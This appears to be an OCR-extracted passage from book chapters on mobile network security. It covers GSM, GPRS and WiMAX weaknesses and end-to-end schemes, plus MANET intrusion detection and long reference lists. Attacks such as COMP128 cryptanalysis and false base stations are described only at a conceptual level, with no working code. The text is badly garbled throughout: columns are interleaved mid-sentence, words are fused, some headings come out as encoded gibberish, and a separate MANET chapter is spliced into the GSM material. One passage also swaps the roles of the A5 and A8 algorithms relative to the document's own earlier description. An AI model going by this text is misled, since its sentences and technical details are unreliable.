Before discussing security weaknesses of indi- radio network services.
vidual G3 technologies, we briefly discuss the • User- and mobile-station authentication
objective of 3G security features. These features schemes: Both user and mobile station share
are (Campbell, Mckunas, Myagmar, Gupta, & a secret common key, which is called the PIN.
Briley, 2002): This is used for authentication.
• Secure services: These services protect
• Mutual authentication: Authentication is the infrastructure against usage and access
a method to verify that the claimed identity misuses.
of an entity is genuine. Authentication is • Security in applications: This is critical for
a fundamental security service and other mobile-based application security.
necessary services often depend on proper • Fraud detection: Mechanisms to detect and
authentication. Many protocols offer a one- combat fraud in roaming situations.
way authentication. That is, only the client • Flexibility: As technologies evolve, secu-
has to authenticate itself to the server and the rity features are extended and enhanced as
server is not required to authenticate itself to required by new services and threats.
the client. A one-way authentication is prone • Service availability and configurability:
to an attack, so-called; impersonation, in Users are to be notified whether security is
which an illegitimate entity could pose as a on and the available level of security.
legitimate one and start a new communica- • Multiple cipher and integrity algorithms:
tion with another legitimate entity or take The mobile user and the network negotiate
control an already started conversation. A and agree on the best available cipher and
two-way authentication scheme (mutual integrity algorithms (e.g., KASUMI).
authentication) resolves impersonation at- • Lawful interception: Mechanisms should be
tack. An E2E security scheme uses a bal- provided to authorize agencies with certain
anced mutual authentication technique. A necessary information about subscribers.
balanced technique requires equal effort by • GSM compatibility: GSM subscribers
both entities for authenticate themselves to should be able to roam in 3G networks and
other entities. This decreases the chance of cope with the extended security needed via
attacker’s success GSM security context.

Figure 1. GSM system overview (Adapted from Pagliusi, 2002)
Figure 2: GSM authentication, cipher key generation, and encryption (Adapted from Pagliusi, 2002)
Figure 3. Authentication and encryption in GSM system (Adapted from Pagliusi, 2002)
gsM gsM security features
In this section, the weaknesses associated to GSM Figure 1 shows the GSM system overview. The
security systems (Pagliusi, 2002) are discussed and principles behind GSM security scheme are:
the E2E security proposals are considered.

• Subscriberidentityconfidentialityscheme, cameraashbulb.
fl Thesetypesofattacksare
• Subscriber identity authentication scheme called optical fault induction. Another type
(Figure 2), of attack, which is performed on the execu-
• Stream ciphering of user traffic and user- tion of COMP128 table lookups is called
related control data schemes; and partitioning attacks.
• Using subscriber identity module (SIM) as a • False BS: GSM provides a unilateral authen-
security module scheme. tication (one-way). Because of the unbalanced
nature, this allows attacks (such as man-in-
Figure 2 shows the GSM authentication scheme the-middle (MITM) attack) where a malicious
in which three algorithms (A3, A5, and A8) are third party masquerades as a BS to one or
used for authentication, key generation, and encryp- more mobile stations.
tion. The detailed authentication and encryption
schemes for GSM are shown in Figure 3, where E2E scheme for gsM
A3 (authentication algorithm), A8 (stream cipher),
and A5 (key agreement algorithm) are performed The security concerns for GSM could be addressed
inthemobilestationandthekeyisverified in an E2Ein the There are two major concerns
fashion.
public land mobile network (PLMN). in the current GSM structure that prevent the
E2E communication, one is the fact that authen-
gsM security Attacks tication is one way (A3/A8) and the fact that data
is exposed and unprotected in certain areas. To
The security attacks associated to GSM architec- preventtheseaws fl andpavethepathtogoE2E,
ture are (Pagliusi, 2002): a strong user authentication along with complete
path encryption are proposed (Aydemir & Selcuk,
• SIM/Mobile Equipment (ME) interface: 2005; Mynttinen, 2000).
The SIM/ME interface is unprotected and can
be tapped using an unauthorized device. strong user Authentication
• Attacks on the algorithms A3/A8/(A5/1):
Both A3 and A8 heavily reply on the A strong authentication protocol is achieved
COMP128 authentication algorithm, which through user-based rather than device-based. The
have been cryptanalyzed allowing the recov- GSM authentication algorithm contains three fun-
ery of shared master key leading to device damental entities in a session (Pagliusi, 2002):
cloning. A5/1 has also been attacked by
Biryukov and Shamir (Pagliusi, 2002). • The mobile subscriber (MS)
• One-way authentication: A3 is a one way • The visiting location register (VLR)
operator-dependent stream-cipher function. • The home location register (HLR)
Therefore its functionality suffers from being
unbalanced The initial draft of GSM states for the authen-
• Unprotected signaling: Though nearly all tication scheme to use a cryptographic authentica-
communications between the MS and the tion key embedded in the SIM card of the device.
BSareencrypted,howeverinthe - fixed net the GSM user authentication protocol
Through
works and between GSM central networks, (GUAP) approach (Aydemir & Selcuk, 2005), the
all the communications and signaling are not user can authenticate himself/herself through a
protected as they are in plaintext most of the password instead of the embedded hard-coded
time key, which breaks the dependency of the SIM
• Attack on SIM card: Interruption could card during authentication. The GUAP is based
occur on the operation of the smart card’s on three entities and in many cases the third entity
microprocessor by exposing it to an electronic is a trusted server whose public key is known by

Figure4.TheGUAPscheme(AdaptedfromAydemir&Selcuk,205)
1. MSWVLR:IMSI
2. VLRWMS:RAND
3. MSWVLR: {n1, n2, n3, {RAND}Π }K HLR, ra
4. VLRWHLR: {n1, n2, n3, {RAND}Π }K HLR, {RAND} KVLR
5. HLRWVLR: {k} KVLR , {n1, n2 ⊕ k}Π
6. VLRWMS: {n1, n2 ⊕ k}Π, {ra}k, rb
7. MSWVLR: {rb}k
all parties. GSM doesn't include synchronized mechanism, such as; TLS, can be used to provide
clocks, therefore authentication timestamps are the required protection. Therefore it is fair to say
not allowed. This can be remedied through the thattherequiredconfidentialityandintegrit
usage of random nonces. According to Figure 4, be guaranteed. However, non-repudiation prop-
through VLR, MS is being authenticated to HLR erty cannot be achieved using this solution. The
through the usage of the password. The HLR to this problem, a digital signature can be
remedy
public key, K HLR, is known to all parties, and KVLR used in the transaction data, which is able to sup-
is the symmetric encryption key shared among the port integrity and non-repudiation functions. All
VLR and the HLR. The GUAP protocol is being WAP clients need to have access to digital keys
depicted in Figure 4. for this to work.
In regards to GSM authentication, the GUAP's
main goal is to break SIM card's dependency for gPrs
addeduserexibility.
fl TheGUAP'sdesignincludes
considerations of the MS's computational restric- GPRS is a data-network-based architecture, which
tions. It also includes provisioning of the VLR is designed in such a way to integrate well with
authentication to both MS and HLR. existing GSM offering MSs “always connected”
packet-switched data services. This includes con-
E2E security of Mobile data in gsM nections to corporate networks and to the Internet.
Figure 5 shows a MS logically attached to a serv-
In this approach, the E2E security scheme of ing GPRS support node (SGSN) (“GPRS Security
mobile data in GSM is considered. It focuses on Threats and Solutions,” 2002).The SGSN's main
wireless application protocol (WAP) security, functionality is to provide data services to the MS.
which can be broken. The data path protection Through the GPRS tunneling protocol (GTP), the
in WAP is especially important for voice over SGSN can logically be connected to the gateway
IP (VoIP) applications. For this purpose, WAP GPRS support node (GGSN). The GTP provides
Transport Layer E2E Security is proposed. The logical connection among the roaming partners of
E2E security for WAP transport layer is a speci- SGSN and GGSN.
fication provided by WapForum for supporting GPRS was introduced as a packet service,
WAP E2E security by allowing the WAP clients to which provides E2E IP connectivity with similar
establish a straight wireless transport layer security security options as in GSM. GPRS uses the same
(WTLS) connection with the WAP-based gateway. A3/A8 algorithms, which is used in GSM but the
This gateway no longer encrypts and decrypts the randomization function is slightly different. The
trafficmeantforthecontent-provider' srd
three3 GPRS
party.encryption algorithms are GEA1,
Thus a malicious node is not able to cause prob- GEA2, and GEA3, which is A5/3.
lemsforthedata'sconfidentialityandintegrity.A

)LJXUH*356DUFKLWHFWXUH$GDSWHGIURP‡*3566HFXULW\7KUHDWVDQG6ROXWLRQV·
*356&ODVVL¿FDWLRQVRI6HFXULW\ Data Services Offered on the Gp and

Services Gi Interfaces
Security services provided by GPRS are protec- Before one can discuss the details about security,
tions against attacks and providing the following it is necessary to discuss the entities related in the
assurances: data path. There are two main interfaces used in
GPRS; Gp and Gi. Gp interface is a logical con-
• Integrity: Integrity is an assurance that data nection among PLMNs. The protocols that deal
is not altered in an unauthorized manner. directly with Gp are:
• &RQ¿GHQWLDOLW\ &RQ¿GHQWLDOLW\LVSURWHFWLQJ
data from disclosure to third parties. • GTP: The logical connection among the
• Authentication: Authentication provides roaming partners of SGSN and GGSN.
assurance that all communication parties are • Boarder gateway protocol (BGP): BGP
really the ones who they claim to be. provides routing for between interfaces.
• Authorization: Authorization is a service, • Dynamic name system (DNS): DNS is a
which ensures that only legitimate entities service that translates Internet domain names
are allowed to take part in any communica- and computer hostnames to IP addresses.
tions.
• Availability: Availability means that com- The GTP provides logical connection among
munication parties and data services are the roaming partners of SGSN and GGSN. If this
available and usable by any other parties in connection is within the same PLMN, this is called
wireless range. the Gn interface. If the connection is between
two different PLMNs, then it is known as the Gp
interface. The Gp and the Gi interfaces are the
initial and fundamental points of interconnection

Security in Mobile Ad Hoc Networks
cal architecture may not be suitable to MANETs information or evidence provided by peers, not
either, due to the rapid topology change of MANETs by trusted authorities or a central administration
and the high overhead introduced by organizing point (as in the Internet or wireless networks with
the hierarchy. base-stations). Additionally, the gathering of the
Sun, Wu, and Pooch (2003) propose a zone- trust evidence may be difficult due to the small
based IDS (ZBIDS). ZBIDS divides the network bandwidth, and therefore local information has to
into nonoverlapping zones. The nodes are cat- be relied on. Evaluation with uncertain and incom-
egorized into two types based on their locations plete trust evidence certainly poses challenges to
to a zone: intrazone nodes (within a zone and not trust management.
connected to nodes in another zone) and interzone Research progress has been made on au-
nodes (within a zone and connected to nodes in thentication and key management. But finding
another zone). Intrazone nodes are responsible cryptographic mechanisms that consume less
for local detection and broadcast in case of alerts. computational resources and impose lower time
Interzone nodes perform aggregation and correla- complexity is still a major research concern in
tion of these local detection results. The system can MANET security.
limit the detection cooperation in a zone, which AnotherproblemforMANETsecurityistofind
may reduce the overhead by the broadcast and ag- an effective and efficient approach intrusion for
gregation. However, the system requires that each response. Many publications simply mentioned
node know its physical location, which needs prior that proper actions should be taken to react to
design setup. The management of zones is not a intrusions, which may include alarming the other
trivial task either. nodes in the network, isolating the compromised
Intrusion detection has been a challenging task nodes, or re-establishing the trust relationship for
for MANETs, mainly due to the distribution na- the entire network. But the problem of how to locate
ture and resource constraints of ad hoc networks. and then isolate the compromised nodes is not dis-
To determine intrusions with local or incomplete cussed in details. The location and isolation could
information and with low overhead has been a be even more difficult when distributed attack
major concern for researchers. are launched from multiple sources. Eliminating
the compromised nodes by rekeying or rebuilding
the trust could be an effective solution. However,
oPEn cHAllEngEs And it is certainly not efficient taking into accou
conclusIon the computation and communication overhead it
may cause.
Some other unexplored research problems in-
challenges
clude the tradeoff between privacy (such as identity
anonymity and location privacy) and other security
The research in MANET security is still in its early
services (such as accounting and intrusion detec-
stage. Some areas that are interesting but little
tion), and the tradeoff between security strengths
explored include accounting, trust management,
and network performance.
authentication, and key management.
Yang et al. (2004) argue that MANET security
Accounting provides the method for collecting
needs a “multifence security solution,” namely re-
the information used for billing, auditing, and
siliency-oriented security design. They argue that
reporting. Accounting mechanisms can track the
the existing proposals are attack-oriented because
services that users are accessing as well as the
theprotocolstargetsomespecificattackthat
amount of network resources they are consuming.
beenidentifiedfirst.Theseprotocolsthereforema
Accounting is a challenging problem due to the
not work well in the presence of unanticipated
distributed and ephemeral nature of MANETs.
attacks. They propose that a security solution is
The characteristics of MANETs also bring
needed that can be embedded into every component
difficulty trust
to management. In MANETs,
or every layer in the network. The solution can
the trustworthiness is evaluated based on the

offer multiple lines of defense against many both International Workshop on Wireless Information
known and unknown security threats. Systems (WIS-2002) (pp. 1-12).
Besides problems described above, how to adapt
Anderegg, L., & Eidenbenz, S. (2003). Routing
the security mechanisms in a large-scale wireless
and forwarding: Ad hoc-VCG: A truthful and
network is also an interesting problem. The scal-
cost-efficient routing protocol for mobile ad hoc
ability of security mechanisms and the compro-
networks with selfish s. Inagent
Proceedings of
mise between security and network scalability
the th
9 Annual International Conference on Mobile
are certainly topics worth further research study.
Computing and Networking MobiCom ( San, ) 50
Diego, (pp. 245-259). ACM Press.
conclusion
Avantvalee, T., & Wu, J. (2006). A survey on in-
With the rapid proliferation of wireless networks trusion detection in mobile ad hoc networks. In Y.
and mobile computing applications, MANETs Xiao, X. Shen, & D. -Z. Du (Eds.), Wireless/mobile
have received increased attention. Security is an network security (pp. 170-196).
important feature for ad hoc networks, especially
Balfanz, D., Smetters, D.K., Stewart, P., & Wong,
inuntrustworthyenvironmentssuchasbattlefields.
H.C. (2002). Talking to strangers: Authentication in
Development of security solutions for ad hoc
ad-hoc wireless networks. Paper presented at the
networks has therefore become a major research
Symposium on Network and Distributed Systems
concern.
Security (NDSS ‘02), San Diego.
However, the characteristics of ad hoc networks
have not only introduced vulnerabilities to mali- Buchegger, S., & Boudec, J.L. (2001). Theselfish
cious attacks varying from passive eavesdropping node: Increasing routing security in mobile ad hoc
to active interfering, but also imposed networks difficulty
(IBM Research Report: RR 3354).
and challenges in introducing security features
to MANETs. Buchegger, S., & Boudec, J.L. (2002a) Nodes
This book chapter has discussed the security bearing grudges: Towards routing security, fair-
vulnerabilities, challenges, and security solu- ness, and robustness in mobile ad hoc networks. In
tions for MANETs. A variety of attacks and their Proceedings of the Tenth Euromicro Workshop on
countermeasureshavebeenidentified Parallel,
fordifferent Distributed and Network-based Process-
network operations, mechanisms, and network lay- ing, Canary Islands, Spain, (pp. 403-410). IEEE
ers. Existing research efforts as well as the open Computer Society.
challenges were discussed in the chapter. Buchegger, S., & Boudec, J.L. (2002b). Performance
analysis of the CONFIDANT protocol: Cooperation
of nodes - fairness in dynamic ad-hoc networks. In
rEfErEncEs Proceedings of IEEE/ACM Symposium on Mobile
Ad Hoc Networking and Computing (MobiHoc),
Lausanne, CH, (pp. 226-236). ACM Press.
Aad, I., Hubaux, J.-P., & Knightly, E.W. (2004).
Denial of service resilience in ad hoc networks. In Buttyán, L., & Hubaux, J.P.- .)02 ( Enforcing
Proceedings of the ACM International Conference service availability in mobile ad-hoc WANs.
on Mobile Computing and Networking (MobiCom In Proceedings of Workshop on Mobile Ad-hoc
2004), Philadelphia, (pp. 202-215). networking and Computing (MobiHOC), Boston,
(pp.. )69- 78
Albers, P., Camp, O., Percher, J., Jouga, B., Me, L.,
& Puttini, R. (2002). Security in ad hoc networks: A Buttyán, L., & Hubaux, J.P.- .)Stimulating
30 2 (
general intrusion detection architecture enhancing cooperation in self-organizing mobile ad hoc
trust based approaches. In Proceedings of the 1st networks. Mobile Networks and Applications,
8(5), 579-592.

Cagalj, M., Ganeriwal, S., Aad, I., & Hubaux, J.-P. Hu, Y.C., Perrig, A., & Johnson, D. (2003b). Rush-
(2004). On cheating in CSMA/CA ad hoc networks ing attacks and defense in wireless ad hoc network
(Tech. Rep. IC/2004/27, EPFL-DI-ICA). Lausanne, routing protocols. In Proceedings of ACM WiSe
Switzerland: Swiss Federal Institute of Technol- 2003, San Diego, (pp. 30-40). ACM Press.
ogy Lausanne.
IEEE. (1999). Standard for wireless LAN-medium
Capkun, S., Buttyan, L., & Hubaux, J.-P. (2003). access control and physical layer specification,
Self-organized public-key management for mobile P802.11.
ad hoc networks. IEEE Transactions on Mobile
Jha, S., Tan, K., & Maxion, R. (2001). Markov
Computing, 2(1), 52-64.
chains, classifiers, and intrusion detection. I
Chan, A.C.-F. (2004). Distributed symmetric Proceedings of the 14th IEEE Computer Security
key management for mobile ad hoc networks. In Foundations Workshop, Cape Breton, Nova Scotia,
Proceedings of the 23rd Annual Joint Confer- Canada, (pp. 206-219).
ence of the IEEE Computer and Communications
Johnson, D.B., Maltz, D.A., & Hu, Y. (2004). The
Societies (INFOCOM), Hong Kong, China, (pp.
dynamic source routing protocol for mobile ad hoc
2414-2424). IEEE.
networks (DSR). INTERNET DRAFT, MANET
Crepeau,C.,&Davis,C.R..A) 302 ( certificate working group. Retrieved November 17th, 2006,
revocation scheme for wireless ad hoc networks. from http://www.ietf.org/internet-drafts/draft-ietf-
In Proceedings of the 1st ACM Workshop Security manet-dsr-10.txt
of Ad Hoc and Sensor Networks, Fairfax, Virginia,
Jones, A. (2000). Game theory: Mathematical
(pp. 54-61). ACM Press.
models of conflict(pp. 210-236). Horwood Pub-
Gupta, V., Krishnamurthy, S., & Faloutsos, M. lishing.
(2002). Denial of service attacks at the MAC layer
Kachirski, O., & Guha, R. (2003). Effective intru-
in wireless ad hoc networks. In Proceedings of
sion detection using multiple sensors in wireless ad
MILCOM.
hoc networks. In Proceedingsofthe6th 3 Annual
Hu, Y.C., Johnson, D., & Perrig, A. (2002). SEAD: Hawaii International Conference on System Sci-
Secureefficientdistancevectorrouting encesfor mobile(pp. 57.1-57.8). IEEE.
(HICSS’03)
wireless ad hoc networks. In Proceedings of the
Kong, J., Zerfos, P., Luo, H., Lu, S., & Zhang, L.
4th IEEE Workshop on Mobile Computing Systems
(2001). Providing robust and ubiquitous security
and Applications (WMCSA ’02), Callicoon, New
support for mobile ad hoc networks. In Proceedings
York, (pp. 3-13).
of the th9 International Conference on Network
Hu, Y.C., Perrig, A., & Johnson, D. (2002). Ari- Protocols (ICNP) (pp. 251 - 260). ACM Press.
adne: A secure on-demand routing protocol for
Konorski, J. (2001). Protection of fairness for
ad hoc networks. In Proceedings of the 8th ACM
multimedia traffic streams in a non-cooperative
International Conference on Mobile Computing
wireless LAN setting. Paper presented at PROMS
and Networking (MobiCom), Atlanta, Georgia,
(LNCS 2213, pp. 116-129). Springer.
Konorski, J. (2002). Multiple access in ad-hoc wire-
Hu, Y.C., Perrig, A., & Johnson, D. (2003a). Packet
less LANs with noncooperative stations. Network-
leashes: A defense against wormhole attacks in
ing (LNCS 2345, pp. 1141-1146). Springer.
Twenty-Second Annual Joint Conference of the Kyasanur, P., & Vaidya, N.H. 20.5)( Selfish
IEEE Computer and Communications Societies MAC layer misbehavior in wireless networks.
(INFOCOM 2003) (pp. 1976-1986). IEEE. IEEE Transactions on Mobile Computing, 4(5),
502-516.

Lu, B., & Pooch, U.W. (2005). A lightweight au- Distributed Systems Modeling and Simulation
thentication protocol for mobile ad hoc networks. Conference (CNDS 2002), San Antonio, TX.
In Proceedings of the International Conference
Perkins, C.E. (Ed.). (2001). Ad hoc networks. Upper
on Information Technology: Coding and Comput-
Saddle River, NJ: Addison-Wesley.
ing (ITCC’0, ) 5 Las Vegas, (pp. 546-551). ACM
Press. Perkins, C.E., Belding-Royer, E.M., & Das, S.R.
(2003). Ad hoc on-demand distance vector (AODV)
Mackenzie, A.B., & Wicker, S.B. (2000). Game
routing. InternetrequestforcommentsRFC. 1 6 5 3
theory and the design of self-configuring, - adap
Retrieved November 17th, 2006, from http://www.
tive wireless networks. IEEE Communications
ietf.org/rfc/rfc3561.txt.
Magazine,93 (11), 126-131.
Perkins, C.E., & Bhagwat, P. (1994). Highly dynam-
Mackenzie, A.B., & Wicker, S.B. (2003). Stability
ic destination-sequenced distance-vector routing
ofmultipacketslottedalohawithselfishusersand
(DSDV)formobilecomputers. Paper presented at
perfect information. In Proceedings of Infocom
the ACM Conference on Communications Architec-
2003, San Francisco, (pp. 1583 -1590). IEEE.
tures, Protocols and Applications (SIGCOMM ‘94)
Macker, J., & Chakeres, I. (2006). Mobile ad-hoc London, (pp. 234-244). ACM Press.
networks (MANET). Retrieved November 17th,
Perrig, A., Canetti, R., Song, D., & Tygar, D.
2006, from http://www.ietf.org/html.charters/ma-
Efficient
. ) 1 02 ( andsecuresourceauthentication
net-charter.html
for multicast. In Proceedings of Network and Dis-
Marti, S., Giuli, T., Lai, K., & Baker, M. (2000). tributed System Security Symposium (NDSS’01),
Mitigating routing misbehavior in mobile ad hoc San Diego, CA, (pp. 35-46).
networks. In Proceedings of the 6th ACM-Inter
Perrig, A., Canetti, R., Tygar, D., & Song, D. (2000)
national Conference on Mobile Computing and
Efficient authentication and signing of multicas
Networking MobiHoc’0
( , ) 5Urbana Champaign,
IL, (pp. 255- 265). ACM Press.
IEEE Symposium on Security and Privacy, Berke-
Michiardi, P., & Molva, R. (2002a). CORE: A ley, CA, (pp. 56-73). IEEE
collaborative reputation mechanism to enforce
Perrig, A., Canetti, R., Tygar, D., & Song, D. (2002,
node cooperation in mobile ad hoc networks.
Summer). The TESLA broadcast authentication
Paper presented at the Sixth IFIP Conference on
protocol. RSACryptoBytes, 5
, 2-13.
Security Communications, and Multimedia (CMS
2002), Portoroz, Slovenia. Radosavac, S., Baras, J.S., & Koutsopoulos, I.
(2005). A framework for MAC protocol misbehav-
Michiardi, P., & Molva, R. (2002b). Game theoretic
ior detection in wireless networks. Paper presented
analysis of security in mobile ad hoc networks
at the Wireless Security Workshop (WiSe ‘05),
(Tech. Rep. RR-02-070). Institut Eurecom.
Cologne, Germany, (pp. 33-42).
Mohan, M., & Joiner, L.L. (2004). Solving bill-
Radosavac, S., Cardenas, A., Baras, J.S., &
ing issues in ad hoc networks. In Proceedings of
Moustakides, G. (2006). Detecting IEEE 802.11
ACMSE ’04, Huntsville, AL, (pp. 31-36). ACM
MAC layer misbehavior in ad hoc networks: Ro-
Press.
bust strategies against individual and colluding
Nash, J. (1950). The bargaining problem. Econo- attacker. Journal of Computer Security: Special
metrica, 18, 155-162. The Econometric Society. Issue on Security of Ad Hoc and Sensor Networks
5 1 (2007), 103-128.
Papadimitratos, P., & Haas, Z.J. (2002). Secure
routing for mobile ad hoc networks. Paper pre- Raya, M., Hubaux, J.-P., & Aad, I. (2004). DOM-
sented at the SCS Communication Networks and INO: A system to detect greedy behavior in IEEE

802.11hotspots. In Proceedings of the Second (WiSe ) 30‘ in conjunction with the th 9 Annual
International Conference on Mobile Systems, Ap- International Conference on Mobile Computing
plications, and Services (MobiSys ‘04), Boston, and Networking (MobiCom ‘03), San Diego, (pp.
MA, (pp. 84-97). 69-78). ACM Press.
Rivest, R.L., Adleman, L., & Dertouzos, M.L. Venkatraman, L., & Agrawal, D. (2000). A novel
(1978). On data banks and privacy homomorphisms authentication scheme for ad hoc networks. Paper
(pp. 169-179). Foundations of secure computation. presented at the IEEE Wireless Communications
Academic Press. and Networking Conference (WCNC 2000), Chi-
cago, IL, (Vol. 3, pp. 1268-1273). IEEE.
Salem, N.B., Buttyan, L., Hubaux, J.-P., & Ja-
kobsson, M. (2003). A charging and rewarding Weimerskirch, A., & Thonet, G. (2001). A distrib-
scheme for packet forwarding in multi-hop cel- uted light-weight authentication model for ad-hoc
lular networks. In Proceedings of MobiHoc’03, networks. In Proceedings of 4th International
Annapolis, MD, (pp. 13-24). ACM Press. Conference on Information Security and Cryp-
tology (ICISC 2001), Seoul, Korea, (pp. 341-354).
Sanzgiri, K., Dahill, B., Levine, B.N., Shields, C.,
ACM Press.
& Royer, E.M. (2002). A secure routing protocol for
ad hoc networks. In Proceedings of the 10th IEEE Xu, W., Trappe, W., Zhang, Y., & Wood, T. (2005).
International Conference on Network Protocols The feasibility of launching and detecting jamming
(ICNP’02), Paris, (pp. 78-87). IEEE. attacks in wireless networks. In Proceedings of the
Sixth ACM International Symposium on Mobile Ad
Song, N., Qian, L., & Li, X. .)052 ( Wormhole
HocNetworkingandComputingMobiHoc ( , ) 5 0‘
attacks detection in wireless ad hoc networks: A
Urbana Champaign, IL, (pp. 48-57). ACM Press.
statistical analysis approach. In Proceedings of
th
91 IEEEInternationalParallelandDistributed Yang, H., Luo, H., Ye, F., Lu, S., & Zhang, L. (2004).
ProcessingSymposium(IPDPS, ) 50‘ Denver, CO, Security in mobile ad hoc networks: Challenges
(pp. 289-296). and solutions. IEEE Wireless Communications,
11(1), 38-47.
Srinivasan, V., Nuggehalli, P., Chiasserini, C.F., &
Rao, R.R. (2003). Cooperation in wireless ad hoc Zapata, M.G. (2006). Secure ad hoc on-demand
networks. In Proceedings of IEEE INFOCOM, distance vector (SAODV) routing. INTERNET
San Francisco, (pp. 808-817). DRAFT, MANET working group. Retrieved De-
cember 12th, 2006, from http://www.ietf.org/inter-
Stajano, F., & Anderson, R.J. (1999). The resur-
net-drafts/draft-guerrero-manet-saodv-06.txt.
recting duckling: Security issues for ad-hoc wire-
less networks. In B. Christiano, B. Crispo, & M. Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion
Roe (Eds.), Security Protocols, 7th International detection techniques for mobile wireless networks.
Workshop Proceedings (LNCS, vol. 1796, pp. Wireless Networks JournalACM ( WINET)
(5),, 9
172-194). 545-556. ACM/Kluwer Press.
Sterne, D., Balasubramanyam, P., Carman, D., Zhong, S., Chen, J., & Yang, Y.R. (2003). Sprite: A
Wilson, B., Talpade, R., Ko, C., et al. (2005). A simple, cheat-proof, credit-based system for mobile
general cooperative intrusion detection architec- ad-hoc networks. In Proceedings of IEEE Infocom,
ture for MANETs. In Proceedings of the 3rd IEEE San Francisco, (pp. 1987-1997). IEEE.
International Workshop on Information Assurance
Zhou, L., & Haas, Z. (1999). Securing ad hoc
(IWIA, ) 50‘ Oahu, HI, (pp. 57-70).
networks. IEEENetwork,6 (13), 24-30.
Sun, B., Wu, K., & Pooch, U.W. (2003). Alert aggre-
Zhu, S., Xu, S., Setia, S., & Jajodia, S. (2003).
gation in mobile ad hoc networks. In Proceedings
LHAP: A lightweight hop-by-hop authentication
of the 2003 ACM Workshop on Wireless Security

bi-directionalcertificateexchangefor mutualframework and the AES-CCM

thentication
authorization is required. This is achieved cipher suit will solve the problem.
by Rivest-Shamir-Adleman (RSA)-based • Security improvements suggestions: As a
mutual authorization based on PKMv2. summary, the following security improve-
• Support of key hierarchy: To support key ments are suggested for Mobile-WiMAX (as
hierarchy, Temporary Key Integrity Protocol well as 802.16d):
(TKIP) is used through utilization of the
master key (MK) and the pairwise master  PKM requires mutual authentication
key (PMK) schemes. (PKMv2), necessary protections
• PKM and EAP messages protections: EAP against reply and a stronger than
has been known to cure security vulner- DES-CBC cipher suite.
abilities, such as in the lack of user identity  Deployment models should include
protection and MITM attack. This requires additional security features for
enabling encryption and utilizing PKM EAP performance related issues (fast
messagesforuserauthentication.Tofixthe roaming, etc).
previous problems, PKM messages should  The current security models and
be bi-directional and EAP messages should solutions are not able to fully utilize
use a four-way handshaking scheme the core network AAA infra
• Weakness in the X.509 certificates: X.509 structures due to the very low PKI
certificatehasthefollowingissues: support.
 A single X.509 credential has
 Is restricted to certain business model limitations. To overcome this, it's
and flexibility is a major issue. recommendedtouseaexible fl
 Does not support user-based identity protocol, such as EAP, which
authentication, due to the fact that supports multiple user credentials.
devices and services are greatly  A scalable security solution is
coupled, and required to be deployed into the
 Trusting acertificateauthorityCA) ( existing architecture and infrastruc-
could become a source of a new ture for 802.16e requirements.
attack.
• Poor IV construction: Initialization vectors E2E security Architecture
(IVs) often use similar and repetitive struc-
tures.Throughtrafficpatternanalysis, Figure 10IVs conceptually displays a client-server-
can easily be known and broken. to remedy based (i.e., VoIP) E2E AAA on 802.16 networks
this, more complex IV structures with high offering portability and fully mobile operations.
key-bits (at least 128-bites) is the remedy to The architecture is built around the three-party
this problem. protocol (PKM v2,) as defined in6e 1 2.08 Agis
(
• 802.16 key exchange issues: A 2-key 3DES et al., 2004).
based key wrap is currently the standard of Figure 10 shows that the over-the-air security
the initial draft for TEK exchange, which is association (authentication and encryption) is es-
not as strong (82bits) as the TEK keys (128 tablished through the PKM-EAP protocol. This is a
bits) it carries. There should be a mechanism complete client/server architecture, where EAP car-
to ensure that TEKs do not repeat for frequent ries the AAA backend connectivity using Radius
exchange of TEKs. This could suffer from or Diameter. EAP offers a strong support for key-
replay attacks, since there is no liveliness in driven cipher mechanisms (i.e., EAP-MSCHAPv2
the key exchange protocol and it also suffers and EAP-AKA). It is also recommended to use an
from MITM attacks. Adding EAP-TLS au- E2E tunneling protocol such as protected EAP

Figure10.826E2Esecurityframework
AP (ACCESS POINT) AUTHENTICATION

SUPPLICANT AUTHENTICATOR SERVER
1. Sends EAP-start message Receives the message
2. Replies with an EAP-request ID
Protected EAP (PEAP) / Verifies the client’s identity
3. Tunneled TLS (TTLS) and bound
4. Receives Accept/Reject message EAP over RADIUS/Diameter
5. If accepted, start PKMv2/ AP forwards the messages
EAP with AES to the Authentication Server
7. If rejected, the end
(PEAP) or tunneled TLS (TTLS) for the purpose rEfErEncEs

of mutual authentication and a 128-bit or better
TLS encryption method to further fortify the E2E Agis, E., Mitchel, H., Ovadia, S., Aissi, S., Bakshi,
security strength(particularly where weaker EAP S., Iyer, P., et al. (2004, August 20). Extending
methods may be deployed). WiMAX technology to mobility. Global, Interop-
erableBroadband Wireless Networks, Intel Journal,
8(03). ISSN 1535-864X
conclusIon
Aydemir, O., & Selcuk, A. A. (2005). GUAP: A
strong user authentication protocol for GSM.
In this chapter, E2E security schemes were dis-
Bilkent University, Turkey.
cussed for 3G technologies; GSM, GPRS, and
CDMA and for Mobile-WiMAX (802.16e). The Campbell, R., Mckunas, D., Myagmar, S., Gupta,
weaknesses of the initial drafts were pointed out V., & Briley, B. (2002, June 28). Analysis of third
and different enhancements were suggested. In generation mobile security. Annual Motorola
most cases, mutual authentication as well as strong Project Review.
algorithms for authentication and authorization
solved the E2E problems. Chang, D. (2002, January). Security along the
Comparing the performance issue, GSM sys- path through GPRS towards 3G mobile telephone
tems have been around for a while and the designed network data services. Bethesda, MD: SANS
architecture had not taken much security into ac- Institute.
count due to the security issues not being severe Code division multiple access (CDMA) end-to-
at the time. However as the technology matured, end security positioning paper. (2005). Nortel
the newer technologies integrated more security Networks.
aspects in their initial drafts, such as in CDMA.
Now Mobile-WiMAX is expected to overcome all Gallop, J. (2005, April 14). The state of the art.
security issues and develop a full-scale E2E archi- WP22. D21 2. Volume 2. Retrieved from http://
tecture with high performance E2E availability and www.akogrimo.org/modules.php?name=UpDow
security options. The encryption/authentication/ nload&req=getit&lid=16
authorization strengths of EAP/TLS/CCMP/PKM GPRS Security Threats and Solutions. (2002).
are unbeatable. A White Paper By NetScreen Technologies Inc.
Retrieved from http:www.
/ firewall-reviews.com/
documents/ACFKM4dU8.pdf

Johnston, D. (2003, September 3). IEEEse

6 1 2. 8 0 - kEy tErMs
curity enhancements. Retrieved from http://www.
ieee802.org/16/tgd/contrib/C80216d-03_60.pdf Authentication, Authorization, and Account-
ing (AAA): AAA is an access control scheme,
Kitsos, P., Galanis, M. D., & Koufopavlou, O. (2004,
overseeing the auditing framework and policy
May 23-26). High-speed hardware implementa-
enforcement for commercial access and comput-
tions of the KASUMI block cipher. In Proceedings
ing systems.
of the 2004 International Symposium on Circuits
andSystems,ISCAS’0.Volume 4 2. Code Division Multiple Access (CDMA):
CDMA is also a 2.5G technology offering codes
